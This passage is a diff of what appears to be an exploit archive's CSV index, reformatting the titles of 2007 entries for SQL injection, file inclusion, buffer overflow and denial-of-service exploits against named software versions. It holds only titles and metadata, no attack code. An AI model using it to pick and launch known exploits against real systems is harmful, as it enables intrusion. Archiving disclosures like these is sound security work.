Local Exploit",2007-03-16,"Stefan Esser",linux,local,0 +3500,platforms/php/webapps/3500.htm,"Particle Blogger <= 1.2.0 - (post.php postid) Remote SQL Injection Exploit",2007-03-16,WiLdBoY,php,webapps,0 3501,platforms/php/webapps/3501.txt,"PHP DB Designer <= 1.02 - Remote File Include Vulnerabilities",2007-03-16,GoLd_M,php,webapps,0 3502,platforms/php/webapps/3502.php,"Php-Stats <= 0.1.9.1b (php-stats-options.php) admin 2 exec() eExploit",2007-03-17,rgod,php,webapps,0 -3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 (view.php logi) Local File Include",2007-03-17,GoLd_M,php,webapps,0 +3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - (view.php logi) Local File Include",2007-03-17,GoLd_M,php,webapps,0 3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes <= 0.2.5 - Remote File Inclusion Exploit",2007-03-17,GoLd_M,php,webapps,0 3505,platforms/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) <= 5.10 - Remote Code Execution",2007-03-18,DarkFig,php,webapps,0 3506,platforms/php/webapps/3506.htm,"Guestbara <= 1.2 Change Admin Login and Password Exploit",2007-03-18,Kacper,php,webapps,0 -3507,platforms/php/webapps/3507.pl,"ScriptMagix FAQ Builder <= 2.0 (index.php) Remote SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 -3508,platforms/php/webapps/3508.txt,"Moodle <= 1.5.2 (moodledata) Remote Session Disclosure",2007-03-18,xSh,php,webapps,0 -3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes <= 2.0 (index.php catid) Remote SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 -3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes <= 2.0 (index.php catid) SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 +3507,platforms/php/webapps/3507.pl,"ScriptMagix FAQ Builder <= 2.0 - (index.php) Remote SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 +3508,platforms/php/webapps/3508.txt,"Moodle <= 1.5.2 - (moodledata) Remote Session Disclosure",2007-03-18,xSh,php,webapps,0 +3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes <= 2.0 - (index.php catid) Remote SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 +3510,platforms/php/webapps/3510.pl,"ScriptMagix Recipes <= 2.0 - (index.php catid) SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 3511,platforms/php/webapps/3511.pl,"ScriptMagix Photo Rating <= 2.0 - Remote SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 3512,platforms/php/webapps/3512.txt,"PHP-Nuke - iFrame (iframe.php) Remote File Inclusion",2007-03-18,"Cold Zero",php,webapps,0 3513,platforms/php/webapps/3513.php,"Katalog Plyt Audio (pl) <= 1.0 - Remote SQL Injection Exploit",2007-03-18,Kacper,php,webapps,0 3514,platforms/windows/dos/3514.pl,"Avant Browser <= 11.0 build 26 - Remote Stack Overflow Crash Exploit",2007-03-18,DATA_SNIPER,windows,dos,0 -3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics <= 2.0 (index.php recid) SQL Injection Exploit",2007-03-19,ajann,php,webapps,0 +3515,platforms/php/webapps/3515.pl,"ScriptMagix Lyrics <= 2.0 - (index.php recid) SQL Injection Exploit",2007-03-19,ajann,php,webapps,0 3516,platforms/php/webapps/3516.php,"MetaForum <= 0.513 Beta Remote File Upload Exploit",2007-03-19,Gu1ll4um3r0m41n,php,webapps,0 3517,platforms/osx/local/3517.php,"PHP 5.2.0 - header() Space Trimming Buffer Underflow Exploit (MacOSX)",2007-03-19,"Stefan Esser",osx,local,0 3518,platforms/php/webapps/3518.pl,"PHP-Nuke Module splattforum 4.0 RC1 - Local File Inclusion Exploit",2007-03-19,GoLd_M,php,webapps,0 @@ -3187,10 +3187,10 @@ id,file,description,date,author,platform,type,port 3521,platforms/php/webapps/3521.pl,"pragmaMX Module Landkarten 2.1 - Local File Inclusion Exploit (Windows)",2007-03-19,bd0rk,php,webapps,0 3522,platforms/php/webapps/3522.pl,"GeBlog 0.1 - GLOBALS[tplname] Local File Inclusion Exploit (Windows)",2007-03-20,GoLd_M,php,webapps,0 3524,platforms/php/webapps/3524.txt,"PHP-Nuke Module htmltonuke 2.0alpha - (htmltonuke.php) RFI",2007-03-20,"Cold Zero",php,webapps,0 -3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 -3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0 +3525,platforms/linux/local/3525.php,"PHP <= 4.4.6 - / 5.2.1 ext/gd Already Freed Resources Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 +3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service Exploit",2007-03-20,MADYNES,hardware,dos,0 3527,platforms/windows/dos/3527.pl,"Mercur IMAPD 5.00.14 - Remote Denial of Service Exploit (Win32)",2007-03-20,mu-b,windows,dos,0 -3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 +3528,platforms/php/webapps/3528.pl,"phpRaid < 3.0.7 - (rss.php phpraid_dir) Remote File Inclusion Exploit",2007-03-20,"Cold Zero",php,webapps,0 3529,platforms/linux/local/3529.php,"PHP <= 5.2.1 hash_update_file() Freed Resource Usage Exploit",2007-03-20,"Stefan Esser",linux,local,0 3530,platforms/php/webapps/3530.pl,"Monster Top List <= 1.4.2 - (functions.php root_path) RFI Exploit",2007-03-20,fluffy_bunny,php,webapps,0 3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 - Remote Heap Overflow Exploit (Windows 2000 SP4)",2007-03-21,"Winny Thomas",windows,remote,554 @@ -3204,36 +3204,36 @@ id,file,description,date,author,platform,type,port 3539,platforms/php/webapps/3539.txt,"mambo component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3540,platforms/windows/remote/3540.py,"Mercur Messaging 2005 <= SP4 - IMAP Remote Exploit (egghunter mod)",2007-03-21,muts,windows,remote,143 3541,platforms/windows/remote/3541.pl,"FutureSoft TFTP Server 2000 - Remote SEH Overwrite Exploit",2007-03-22,"Umesh Wanve",windows,remote,69 -3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 (BASE) Remote File Inclusion Vulnerabilities",2007-03-22,GoLd_M,php,webapps,0 -3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 (idnews) Remote SQL Injection Exploit",2007-03-22,"Mehmet Ince",php,webapps,0 +3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion Vulnerabilities",2007-03-22,GoLd_M,php,webapps,0 +3543,platforms/php/webapps/3543.pl,"PortailPhp 2.0 - (idnews) Remote SQL Injection Exploit",2007-03-22,"Mehmet Ince",php,webapps,0 3544,platforms/windows/remote/3544.c,"Microsoft DNS Server - (Dynamic DNS Updates) Remote Exploit",2007-03-22,"Andres Tarasco",windows,remote,0 3545,platforms/php/webapps/3545.txt,"Lms <= 1.8.9 Vala Remote File Inclusion Vulnerabilities",2007-03-22,Kacper,php,webapps,0 -3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 (calendar.asp eventid) SQL Injection",2007-03-22,parad0x,asp,webapps,0 +3546,platforms/asp/webapps/3546.txt,"aspWebCalendar 4.5 - (calendar.asp eventid) SQL Injection",2007-03-22,parad0x,asp,webapps,0 3547,platforms/windows/dos/3547.c,"0irc-client 1345 build20060823 - Denial of Service Exploit",2007-03-22,DiGitalX,windows,dos,0 -3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 (op) Local File Inclusion Exploit",2007-03-23,GoLd_M,php,webapps,0 +3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion Exploit",2007-03-23,GoLd_M,php,webapps,0 3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - (default.asp catid) Remote SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 -3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 (buyersend.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 -3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 +3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 +3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3552,platforms/php/webapps/3552.txt,"Philex <= 0.2.3 - RFI / File Disclosure Remote Vulnerabilities",2007-03-23,GoLd_M,php,webapps,0 -3554,platforms/linux/remote/3554.pm,"dproxy <= 0.5 - Remote Buffer Overflow Exploit (meta 2.7)",2007-03-23,"Alexander Klink",linux,remote,53 +3554,platforms/linux/remote/3554.pm,"dproxy <= 0.5 - Remote Buffer Overflow Exploit (Metasploit)",2007-03-23,"Alexander Klink",linux,remote,53 3555,platforms/multiple/remote/3555.pl,"Ethernet Device Drivers Frame Padding - Info Leakage Exploit (Etherleak)",2007-03-23,"Jon Hart",multiple,remote,0 -3556,platforms/asp/webapps/3556.htm,"Active Newsletter <= 4.3 (ViewNewspapers.asp) SQL Injection Exploit",2007-03-23,ajann,asp,webapps,0 +3556,platforms/asp/webapps/3556.htm,"Active Newsletter <= 4.3 - (ViewNewspapers.asp) SQL Injection Exploit",2007-03-23,ajann,asp,webapps,0 3557,platforms/php/webapps/3557.txt,"Joomla/Mambo Component SWmenuFree 4.0 - RFI",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.htm,"eWebquiz <= 8 - (eWebQuiz.asp) Remote SQL Injection Exploit",2007-03-23,ajann,asp,webapps,0 3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - unserialize() Local Information Leak Exploit",2007-03-23,"Stefan Esser",multiple,local,0 3560,platforms/php/webapps/3560.txt,"Joomla Component Joomlaboard 1.1.1 - (sbp) RFI",2007-03-23,"Cold Zero",php,webapps,0 -3561,platforms/windows/remote/3561.pl,"Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit",2007-03-24,"Jacopo Cervini",windows,remote,143 +3561,platforms/windows/remote/3561.pl,"Mercury Mail 4.0.1 - (LOGIN) Remote IMAP Stack Buffer Overflow Exploit",2007-03-24,"Jacopo Cervini",windows,remote,143 3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 3563,platforms/php/webapps/3563.txt,"ttCMS <= 4 - (ez_sql.php lib_path) Remote File Inclusion",2007-03-24,Kacper,php,webapps,0 3564,platforms/php/webapps/3564.pl,"Joomla Component Car Manager <= 1.1 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 3565,platforms/php/webapps/3565.pl,"Joomla Component RWCards <= 2.4.3 - Remote SQL Injection Exploit",2007-03-24,ajann,php,webapps,0 -3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 / 1.4.1 SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 +3566,platforms/multiple/dos/3566.pl,"Asterisk <= 1.2.16 - / 1.4.1 SIP INVITE Remote Denial of Service Exploit",2007-03-25,MADYNES,multiple,dos,0 3567,platforms/php/webapps/3567.pl,"Mambo Module Flatmenu <= 1.07 - Remote File Include Exploit",2007-03-25,"Cold Zero",php,webapps,0 -3568,platforms/php/webapps/3568.txt,"Free Image Hosting <= 2.0 (AD_BODY_TEMP) Remote File Inclusion Vulnerabilities",2007-03-25,Crackers_Child,php,webapps,0 +3568,platforms/php/webapps/3568.txt,"Free Image Hosting <= 2.0 - (AD_BODY_TEMP) Remote File Inclusion Vulnerabilities",2007-03-25,Crackers_Child,php,webapps,0 3569,platforms/php/webapps/3569.pl,"PBlang <= 4.66z Remote Create Admin Exploit",2007-03-25,Hessam-x,php,webapps,0 3570,platforms/windows/remote/3570.c,"WarFTP 1.65 - (USER) Remote Buffer Overlow Exploit",2007-03-25,niXel,windows,remote,21 -3571,platforms/linux/local/3571.php,"PHP < 4.4.5 / 5.2.1 _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 -3572,platforms/linux/local/3572.php,"PHP < 4.4.5 / 5.2.1 _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0 +3571,platforms/linux/local/3571.php,"PHP < 4.4.5 - / 5.2.1 _SESSION unset() Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 +3572,platforms/linux/local/3572.php,"PHP < 4.4.5 - / 5.2.1 _SESSION Deserialization Overwrite Exploit",2007-03-25,"Stefan Esser",linux,local,0 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0 3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC - Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0 @@ -3243,67 +3243,67 @@ id,file,description,date,author,platform,type,port 3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 - Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0 3581,platforms/php/webapps/3581.pl,"IceBB 1.0-rc5 - Remote Code Execution Exploit",2007-03-26,Hessam-x,php,webapps,0 3582,platforms/php/webapps/3582.pl,"PHP-Nuke Module Addressbook 1.2 - Local File Inclusion Exploit",2007-03-26,bd0rk,php,webapps,0 -3583,platforms/php/webapps/3583.txt,"C-Arbre <= 0.6PR7 (root_path) Remote File Inclusion",2007-03-26,K-159,php,webapps,0 +3583,platforms/php/webapps/3583.txt,"C-Arbre <= 0.6PR7 - (root_path) Remote File Inclusion",2007-03-26,K-159,php,webapps,0 3584,platforms/multiple/remote/3584.pl,"Oracle 10g KUPM$MCP.MAIN - SQL Injection Exploit (2)",2007-03-27,bunker,multiple,remote,0 3585,platforms/multiple/remote/3585.pl,"Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit",2007-03-27,bunker,multiple,remote,0 -3586,platforms/linux/dos/3586.php,"PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 +3586,platforms/linux/dos/3586.php,"PHP 4.4.5 - / 4.4.6 session_decode() Double Free Exploit PoC",2007-03-27,"Stefan Esser",linux,dos,0 3587,platforms/linux/local/3587.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (1)",2007-03-27,"Robert Swiecki",linux,local,0 -3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0 +3588,platforms/php/webapps/3588.pl,"XOOPS module Articles <= 1.02 - (print.php id) SQL Injection Exploit",2007-03-27,WiLdBoY,php,webapps,0 3589,platforms/windows/remote/3589.pm,"NaviCOPA Web Server 2.01 - Remote Buffer Overflow Exploit (Metasploit)",2007-03-27,skillTube,windows,remote,80 3590,platforms/php/webapps/3590.htm,"Joomla Component D4JeZine <= 2.8 - Remote BLIND SQL Injection Exploit",2007-03-27,ajann,php,webapps,0 3591,platforms/php/webapps/3591.txt,"PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) RFI",2007-03-27,"ThE TiGeR",php,webapps,0 3592,platforms/php/webapps/3592.htm,"Web Content System 2.7.1 - Remote File Inclusion Exploit",2007-03-27,kezzap66345,php,webapps,0 3593,platforms/windows/local/3593.c,"Corel Wordperfect X3 13.0.0.565 - (.PRS) Local Buffer Overflow Exploit",2007-03-28,"Jonathan So",windows,local,0 -3594,platforms/php/webapps/3594.pl,"XOOPS module Articles <= 1.03 (index.php cat_id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 +3594,platforms/php/webapps/3594.pl,"XOOPS module Articles <= 1.03 - (index.php cat_id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 3595,platforms/linux/local/3595.c,"Linux Kernel <= 2.6.20 with DCCP Support - Memory Disclosure Exploit (2)",2007-03-28,"Robert Swiecki",linux,local,0 -3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 (header.php) Remote File Include",2007-03-28,GoLd_M,php,webapps,0 -3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder <= 3.3 (view.php id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 -3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 -3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 beta 2 (phpbb_root_path) Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 +3596,platforms/php/webapps/3596.txt,"iPhotoAlbum 1.1 - (header.php) Remote File Include",2007-03-28,GoLd_M,php,webapps,0 +3597,platforms/php/webapps/3597.pl,"XOOPS Module Friendfinder <= 3.3 - (view.php id) SQL Injection Exploit",2007-03-28,ajann,php,webapps,0 +3598,platforms/php/webapps/3598.txt,"MangoBery CMS 0.5.5 - (quotes.php) Remote File Inclusion",2007-03-28,kezzap66345,php,webapps,0 +3599,platforms/php/webapps/3599.txt,"CodeBB 1.0 beta 2 - (phpbb_root_path) Remote File Inclusion",2007-03-28,"Alkomandoz Hacker",php,webapps,0 3600,platforms/php/webapps/3600.txt,"Softerra Time-Assistant <= 6.2 - (inc_dir) Remote File Inclusion",2007-03-29,K-159,php,webapps,0 3601,platforms/php/webapps/3601.pl,"sBLOG 0.7.3 Beta (inc/lang.php) Local File Inclusion Exploit",2007-03-29,GoLd_M,php,webapps,0 -3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 (username) Remote Denial of Service Exploit",2007-03-29,"Winny Thomas",windows,dos,0 +3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - (username) Remote Denial of Service Exploit",2007-03-29,"Winny Thomas",windows,dos,0 3603,platforms/php/webapps/3603.pl,"XOOPS Module MyAds Bug Fix <= 2.04jp (index.php) SQL Injection Exploit",2007-03-29,ajann,php,webapps,0 -3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 -3605,platforms/php/webapps/3605.php,"Picture-Engine <= 1.2.0 (wall.php cat) Remote SQL Injection Exploit",2007-03-29,Kacper,php,webapps,0 -3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0 +3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - (Mediasvr.exe) Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111 +3605,platforms/php/webapps/3605.php,"Picture-Engine <= 1.2.0 - (wall.php cat) Remote SQL Injection Exploit",2007-03-29,Kacper,php,webapps,0 +3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 DoS Hang / Crash Exploit",2007-03-29,shinnai,multiple,dos,0 3607,platforms/php/webapps/3607.txt,"Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities",2007-03-29,"ThE dE@Th",php,webapps,0 -3608,platforms/php/webapps/3608.txt,"Advanced Login <= 0.7 (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 +3608,platforms/php/webapps/3608.txt,"Advanced Login <= 0.7 - (root) Remote File Inclusion",2007-03-29,Bithedz,php,webapps,0 3609,platforms/linux/remote/3609.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)",2007-03-30,"Winny Thomas",linux,remote,0 3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - (dvdtools.ocx) Remote Buffer Overflow Exploit",2007-03-30,"Umesh Wanve",windows,remote,0 3611,platforms/php/webapps/3611.txt,"JC URLshrink 1.3.1 - Remote Code Execution",2007-03-30,Dj7xpl,php,webapps,0 3612,platforms/php/webapps/3612.pl,"XOOPS Module Repository (viewcat.php) Remote SQL Injection Exploit",2007-03-30,ajann,php,webapps,0 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 - RFI",2007-03-30,bd0rk,php,webapps,0 -3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 +3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 - (login.php table) Local File Inclusion",2007-03-30,GoLd_M,php,webapps,0 3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)",2007-03-30,mu-b,linux,remote,53 3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0 -3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 +3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 - (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 3620,platforms/php/webapps/3620.pl,"XOOPS Module Core (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 3621,platforms/php/webapps/3621.pl,"XOOPS Module Tutoriais (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0 -3622,platforms/php/webapps/3622.php,"WinMail Server 4.4 build 1124 (WebMail) Remote Add Super User Exploit",2007-04-01,rgod,php,webapps,0 -3623,platforms/php/webapps/3623.pl,"XOOPS Module eCal <= 2.24 (display.php) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3622,platforms/php/webapps/3622.php,"WinMail Server 4.4 build 1124 - (WebMail) Remote Add Super User Exploit",2007-04-01,rgod,php,webapps,0 +3623,platforms/php/webapps/3623.pl,"XOOPS Module eCal <= 2.24 - (display.php) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3624,platforms/php/webapps/3624.txt,"BT-sondage 1.12 - (gestion_sondage.php) RFI",2007-04-01,Crackers_Child,php,webapps,0 -3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event <= 1.01 (id) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3626,platforms/php/webapps/3626.pl,"XOOPS Module Kshop <= 1.17 (id) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3625,platforms/php/webapps/3625.pl,"XOOPS Module Tiny Event <= 1.01 - (id) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3626,platforms/php/webapps/3626.pl,"XOOPS Module Kshop <= 1.17 - (id) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit",2007-04-01,Heretic2,windows,remote,143 -3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 (INCLUDE_PATH) Remote File Inclusion Vulnerabilities",2007-04-01,GoLd_M,php,webapps,0 -3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail <= 1.1 (camid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser <= 0.92 (genre.php) BLIND SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 -3631,platforms/php/webapps/3631.txt,"Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 -3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P <= 2.0 (cid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3628,platforms/php/webapps/3628.txt,"CWB PRO 1.5 - (INCLUDE_PATH) Remote File Inclusion Vulnerabilities",2007-04-01,GoLd_M,php,webapps,0 +3629,platforms/php/webapps/3629.pl,"XOOPS Module Camportail <= 1.1 - (camid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3630,platforms/php/webapps/3630.htm,"XOOPS Module debaser <= 0.92 - (genre.php) BLIND SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 +3631,platforms/php/webapps/3631.txt,"Flexphpnews 0.0.5 - (news.php newsid) Remote SQL Injection",2007-04-01,Dj7xpl,php,webapps,0 +3632,platforms/php/webapps/3632.pl,"XOOPS Module myAlbum-P <= 2.0 - (cid) Remote SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3633,platforms/php/webapps/3633.htm,"XOOPS Module RM+Soft Gallery 1.0 - Blind SQL Injection Exploit",2007-04-01,ajann,php,webapps,0 3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor (.ANI) Remote Overflow Exploit",2007-04-01,jamikazu,windows,remote,0 3635,platforms/windows/remote/3635.txt,"Microsoft Windows XP - Animated Cursor (.ANI) Remote Overflow Exploit (2)",2007-04-01,"Trirat Puttaraksa",windows,remote,0 3636,platforms/windows/remote/3636.txt,"Microsoft Windows - Animated Cursor (.ANI) Remote Exploit (eeye patch bypass)",2007-04-01,jamikazu,windows,remote,0 3638,platforms/php/webapps/3638.txt,"maplab ms4w 2.2.1 - Remote File Inclusion",2007-04-02,ka0x,php,webapps,0 -3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 (cid) Remote SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 -3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 (cid) Remote SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 +3639,platforms/php/webapps/3639.txt,"PHP-Fusion Module topliste 1.0 - (cid) Remote SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 +3640,platforms/php/webapps/3640.txt,"PHP-Fusion Module Arcade 1.0 - (cid) Remote SQL Injection",2007-04-02,"Mehmet Ince",php,webapps,0 3641,platforms/php/webapps/3641.txt,"Really Simple PHP and Ajax (RSPA) 2007-03-23 - RFI",2007-04-02,"Hamid Ebadi",php,webapps,0 -3644,platforms/php/webapps/3644.pl,"XOOPS Module WF-Section <= 1.01 (articleid) SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 -3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection <= 1.07 (articleid) BLIND SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 -3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 (print.php) Remote SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 +3644,platforms/php/webapps/3644.pl,"XOOPS Module WF-Section <= 1.01 - (articleid) SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 +3645,platforms/php/webapps/3645.htm,"XOOPS Module XFsection <= 1.07 - (articleid) BLIND SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 +3646,platforms/php/webapps/3646.pl,"XOOPS Module Zmagazine 1.0 - (print.php) Remote SQL Injection Exploit",2007-04-02,ajann,php,webapps,0 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3648,platforms/windows/local/3648.c,"IrfanView 3.99 - (.ANI) Local Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 Server Manager Local Site Buffer Overflow Exploit",2007-04-02,Marsu,windows,local,0 @@ -3312,47 +3312,47 @@ id,file,description,date,author,platform,type,port 3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor (.ANI) Overflow Exploit (Hardware DEP)",2007-04-03,devcode,windows,local,0 3653,platforms/php/webapps/3653.php,"MyBulletinBoard (MyBB) <= 1.2.3 - Remote Code Execution Exploit",2007-04-03,DarkFig,php,webapps,0 3654,platforms/multiple/remote/3654.pl,"HP Mercury Quality Center 9.0 build 9.1.0.4352 SQL Execution Exploit",2007-04-03,"Isma Khan",multiple,remote,0 -3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog <= 2.52 (postid) BLIND SQL Injection Exploit",2007-04-03,ajann,php,webapps,0 +3655,platforms/php/webapps/3655.htm,"XOOPS Module PopnupBlog <= 2.52 - (postid) BLIND SQL Injection Exploit",2007-04-03,ajann,php,webapps,0 3656,platforms/php/webapps/3656.pl,"WordPress 2.1.2 - (xmlrpc) Remote SQL Injection Exploit",2007-04-03,"Sumit Siddharth",php,webapps,0 3657,platforms/php/webapps/3657.txt,"MySpeach <= 3.0.7 - Remote/Local File Inclusion",2007-04-03,Xst3nZ,php,webapps,0 3658,platforms/php/webapps/3658.htm,"phpMyNewsletter 0.6.10 - (customize.php l) RFI",2007-04-04,frog-m@n,php,webapps,0 3659,platforms/php/webapps/3659.txt,"AROUNDMe 0.7.7 - Multiple Remote File Inclusion Vulnerabilities",2007-04-04,kezzap66345,php,webapps,0 -3660,platforms/php/webapps/3660.pl,"CyBoards PHP Lite 1.21 (script_path) Remote File Include 